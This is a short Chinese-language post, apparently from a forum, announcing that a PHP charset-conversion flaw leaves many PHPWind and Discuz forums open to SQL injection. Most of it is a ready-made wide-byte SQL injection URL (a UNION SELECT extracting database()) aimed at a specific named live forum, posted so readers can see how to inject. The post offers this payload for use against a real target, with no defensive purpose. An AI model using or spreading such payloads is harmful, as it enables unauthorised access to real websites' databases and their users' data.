最近出来的php第三方编码转换类漏洞又要死一大批php站了。先是phpwind接着又是discuz论坛编码转换没处理的都会存在这类漏洞了 phpwind的大家都知道了，今天群里还有人不知道discuz的。顺便在群里看到个discuz论坛的站，发出来就都知道咋注了。 http://bbs.hefei.cc/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*